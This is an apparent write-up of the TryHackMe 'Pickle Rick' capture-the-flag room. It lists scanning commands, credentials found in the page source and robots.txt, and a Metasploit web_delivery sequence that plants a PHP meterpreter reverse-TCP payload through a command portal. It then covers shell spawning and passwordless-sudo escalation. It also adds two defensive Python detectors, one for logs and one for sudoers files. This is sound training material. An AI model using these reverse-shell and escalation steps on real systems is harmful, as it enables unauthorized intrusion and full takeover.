Pickle Rick - TryHackMe

This challenge, inspired by the world of Rick and Morty, tasks you with exploiting a web server to find three ingredients. Rick needs them to concoct a potion that will reverse his transformation into a pickle and return him to his human form.

PORT ENUMERATION

The command nmap -A -Pn -T4 10.10.127.250 performs an aggressive scan of the target, 10.10.127.250. The -A flag enables OS detection, version detection and script scanning; -Pn skips host discovery and treats the host as up; -T4 selects a moderately fast timing template. The aim is to enumerate the target's open ports and services and, where possible, identify its operating system and software versions.

SOURCE CODE ANALYSIS

After executing the nmap command and conducting the network scan, I proceeded to further investigate the target by opening the associated website. Upon inspecting the website's source code, I discovered a username embedded within it, specifically "R1ckRul3s." This username may potentially be relevant for further penetration testing or authentication attempts, suggesting its importance in the context of the target system's security or access control.

ROBOTS.TXT

While examining the website at https://10.10.127.250, I also checked its "robots.txt" file, and within this file, I came across the text "Wubbalubbadubdub." This discovery hints that "Wubbalubbadubdub" might be a password of significance, potentially offering an entry point or access to certain parts of the website or the target system. Further investigation and testing may be necessary to determine the exact context and utility of this password.

NIKTO WEB VULNERABILITY SCANNER

Running nikto -h "https://10.10.127.250" -C all performs a web vulnerability assessment of the target. Nikto reported the presence of /login.php on the web server, which points to a login page and therefore an obvious place to test the credentials gathered so far. The purpose of the scan is to identify and report weaknesses in the web server and its applications so that the overall security posture can be assessed and the risks mitigated.

LOGIN PAGE

Logging in to the portal at https://10.10.127.250/portal.php with the credentials discovered earlier (username R1ckRul3s, password Wubbalubbadubdub) gives access to a command panel. This portal is the pivot point for further interaction with the target, since it allows commands to be executed on the system.

METASPLOIT FRAMEWORK - METERPRETER SESSION

sudo msfconsole
search web delivery
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 10.2.51.43
exploit
Copy and paste the generated payload into the portal page
Meterpreter session

This sequence uses the Metasploit Framework's web_delivery module to generate a PHP Meterpreter reverse TCP payload. After the local host and payload type are set, running exploit prints the payload command. That command is copied and pasted into the portal page, where it is executed by the vulnerable command panel. On success a Meterpreter session connects back, giving interactive control over the compromised system.
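The web-side chain described so far (robots.txt read, Nikto scan, login to login.php, commands submitted through portal.php) leaves a distinctive trail in the web server's access log. As an added example that is not part of the original writeup, this Python function parses combined-format log lines (a constructed sample is embedded, using the lhost address from the page as the client) and reports, per client, the indicators a defender would alert on.

```python
import re
from collections import defaultdict

# "Combined" access-log format as written by Apache and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample (not from the real machine); the paths mirror the writeup:
# robots.txt, a Nikto scan, a login to login.php, then commands via portal.php.
SAMPLE_LOG = """\
10.2.51.43 - - [01/Oct/2023:12:00:01 +0000] "GET / HTTP/1.1" 200 1062 "-" "Mozilla/5.0"
10.2.51.43 - - [01/Oct/2023:12:00:09 +0000] "GET /robots.txt HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.2.51.43 - - [01/Oct/2023:12:01:00 +0000] "GET /login.php HTTP/1.1" 200 882 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
10.2.51.43 - - [01/Oct/2023:12:01:00 +0000] "GET /admin/ HTTP/1.1" 404 275 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
10.2.51.43 - - [01/Oct/2023:12:05:30 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.2.51.43 - - [01/Oct/2023:12:05:31 +0000] "GET /portal.php HTTP/1.1" 200 1513 "-" "Mozilla/5.0"
10.2.51.43 - - [01/Oct/2023:12:06:02 +0000] "POST /portal.php HTTP/1.1" 200 1610 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Oct/2023:12:07:00 +0000] "GET /index.html HTTP/1.1" 200 1062 "-" "Mozilla/5.0"
"""

def analyse(log_text, not_found_threshold=20):
    """Return {client_ip: [finding, ...]} for clients whose requests fit the
    recon-to-command-execution chain seen in the writeup."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:                                   # malformed lines are skipped
            by_ip[m.group("ip")].append(m.groupdict())
    report = {}
    for ip, evs in by_ip.items():
        findings = []
        if any("nikto" in e["ua"].lower() for e in evs):
            findings.append("scanner user-agent (Nikto)")
        n404 = sum(e["status"] == "404" for e in evs)
        if n404 >= not_found_threshold:         # forced-browsing burst
            findings.append(f"{n404} 404 responses (forced browsing)")
        reqs = [(e["method"], e["path"]) for e in evs]      # in log order
        if ("GET", "/robots.txt") in reqs:
            after = reqs[reqs.index(("GET", "/robots.txt")):]
            if ("POST", "/login.php") in after:
                findings.append("robots.txt read followed by POST /login.php")
        cmds = sum(1 for r in reqs if r == ("POST", "/portal.php"))
        if cmds:
            findings.append(f"{cmds} command submission(s) to /portal.php")
        if findings:
            report[ip] = findings
    return report
```

The 404 threshold is deliberately high by default; a real Nikto run produces hundreds of 404s, while the constructed sample contains only one.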

FIRST INGREDIENT

SECOND INGREDIENT

Once the Meterpreter session is established, the command python3 -c 'import pty; pty.spawn("/bin/bash")' spawns a proper interactive shell, which makes working on the target far easier than the limited shell the session starts with. Then cat * prints the contents of every file in the current directory in search of the second flag.

PRIVILEGE ESCALATION AND GETTING THE FINAL FLAG

In the final stage, sudo -l shows that the current user has unrestricted sudo access ((ALL) NOPASSWD: ALL), meaning any command can be run as root without a password prompt. sudo su switches to the root user. From there, cd /root followed by cat 3rd.txt reveals the third and final flag, completing the Capture The Flag (CTF) challenge.
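The (ALL) NOPASSWD: ALL entry that sudo -l revealed above is the kind of misconfiguration a defender should catch before an attacker does. As an added example that is not part of the original writeup, this Python function parses sudoers-style specification lines (a constructed sample is embedded) and reports which users or groups can run any command as root without a password, taking into account that a NOPASSWD: tag carries over to later commands in the same entry until a PASSWD: tag resets it.

```python
import re

# Constructed sample for this example (not the machine's real sudoers). The
# www-data line has the shape of the entry the writeup found with sudo -l.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup   ALL=(ALL) NOPASSWD: /usr/bin/rsync, PASSWD: ALL
"""

# user-or-group  hosts=(runas) [TAG:] command[, [TAG:] command ...]
SPEC_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmnds>.+)$'
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

def passwordless_full_sudo(sudoers_text):
    """Return [(who, runas)] for every spec that grants NOPASSWD on ALL commands
    with a runas list containing root or ALL, i.e. passwordless root."""
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"            # no (runas) means root
        runas_users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not runas_users & {"ALL", "root"}:
            continue
        # A tag like NOPASSWD: applies to every later command until PASSWD: resets it.
        nopasswd = False
        for cmnd in m.group("cmnds").split(","):
            cmnd = cmnd.strip()
            while ":" in cmnd and cmnd.split(":", 1)[0].strip().isupper():
                tag, cmnd = (p.strip() for p in cmnd.split(":", 1))
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
            if nopasswd and cmnd == "ALL":
                hits.append((m.group("who"), runas))
                break
    return hits
```

Run it against the output of visudo -c -f or a copy of /etc/sudoers and its includes; the deploy and backup entries in the sample show that NOPASSWD on a single command, or followed by PASSWD: ALL, is not flagged.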

More articles by Eduardo Cochella